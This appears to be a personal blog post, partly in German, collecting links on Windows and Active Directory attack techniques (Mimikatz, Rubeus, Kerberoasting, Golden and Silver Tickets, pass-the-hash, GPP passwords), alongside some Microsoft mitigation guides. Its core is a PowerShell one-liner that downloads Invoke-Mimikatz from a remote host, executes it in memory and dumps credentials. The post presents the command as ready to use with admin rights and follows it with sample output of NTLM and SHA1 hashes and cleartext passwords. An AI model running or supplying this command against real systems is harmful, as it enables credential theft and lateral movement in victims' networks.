Hacker Information (Tutorial)
Good Book ;-)
Microsoft Empfehungen:
https://docs.microsoft.com/de-de/windows/security/identity-protection/windows-credential-theft-mitigation-guide-abstractIntroducing Managed Service Accounts:
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd560633(v=ws.10)
Windows Credential Guard & Mimikatz:
https://blog.nviso.eu/2018/01/09/windows-credential-guard-mimikatz/
Useful Links ...
New Ideas of Cybercrime @ Heise:
https://www.heise.de/hintergrund/Cybercrime-Erpressung-auf-neuem-Niveau-4867430.html
Golden Ticket:
https://blog.varonis.de/kerberos-angriffe-wie-lassen-sich-golden-tickets-stoppen/
Silver Ticket:
https://www.secupedia.info/wiki/Golden_Ticket/Silver_Ticket
Recon:
Bloodhound:
Creds Theft / Reuse:
Mimikatz :
Rubeus:
https://github.com/GhostPack/Rubeus *** Very good Docu!
SQL:
Docu:
https://blog.netspi.com/powerupsql-powershell-toolkit-attacking-sql-server *** Very good Docu!
Kerberoasting:
https://www.secura.com/blog-kerberoasting-exploiting-kerberos-to-compromise-microsoft-active-directory *** Very good Docu!
Passwords in Group Policy (GPP):
(Problem: Encryption is AES, but private key is well-known ...)
PowerSploit:
Quick-Mimikatz in Action - Grab the Passwords as Hash & Clear Text ...
You just need a powershell with admin rights ;-)https://gist.github.com/gfoss/ca6aa37f97fd400ff14f
e.g.:
| IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; |
=>
a lot of stuff:
as hash only:
[00000003] Primary
* Username : NBANTON$
* Domain : MYDOMAIN
* NTLM : 1786a4eD3b8f5Cd99d594a6566f1c430
* SHA1 : 91b6e0c077ccb007047e64d3a852326bfdbefe28
sometimes in clear text as well ...
credman :
[00000000]
* Username : (null)
* Domain : MicrosoftOffice16_Data:SSPI:abc@IlikeYou.com
* Password : Katze123!
[00000001]
* Username : abc@IlikeYou.com
* Domain : outlook.office365.com
* Password : Katze123!
[00000002]
* Username : @@BbTAXlNm#moFSauk7a9hTPlqdZ2F
* Domain : Microsoft_OC1:uri=abc@IlikeYou.com:certificate:OCS:1
* Password : (null)
* Marshaled: [Cert] SHA1:91b6e0c077ccb007047e64d3a852326bfdbefe28
[00000003]
* Username : abc@IlikeYou.com
* Domain : autodiscover-s.outlook.com
* Password : Katze123!
Windows Password Hacks / NTLM Hashes ...
https://null-byte.wonderhowto.comhttps://null-byte.wonderhowto.com/how-to/perform-pass-hash-attack-get-system-access-windows-0196077/
http://woshub.com/how-to-get-plain-text-passwords-of-windows-users/#h2_2
https://www.der-windows-papst.de/2019/07/08/protected-users-group/
https://docs.microsoft.com/de-de/windows-server/security/credentials-protection-and-management/protected-users-security-group
https://docs.microsoft.com/de-de/security-updates/SecurityAdvisories/2014/2871997?redirectedfrom=MSDN
https://support.microsoft.com/de-de/help/2973351/microsoft-security-advisory-registry-update-to-improve-credentials-pro
https://www.semperis.com/blog/easy-hacking-active-directory-password/
https://www.der-windows-papst.de/2019/07/10/active-directory-backdoor-man-in-the-middle/
https://www.der-windows-papst.de/wp-content/uploads/2019/07/Active-Directory-Backdoor-Man-in-the-Middle.pdf
Hacker 101 Tutorials
Hacker One
Mit Hacker 101 zum Millionär ;-)
Powershell - Mostly used tool for Trojan Horses
Office-Cracks, NTLM Hacking, WIFI, and, and and ...
https://null-byte.wonderhowto.comSeach Engine for "open Servers" (Windows, WebCam etc.)
Shodan @ WikipediaDarknet, TOR & .onion:
http://gueldenpfennigs.blogspot.com/2019/01/darknet-tor-und-onion-tld.html( hack, hacking, hacker, warez, gamez, 101, ccc )
0 Kommentare:
Kommentar veröffentlichen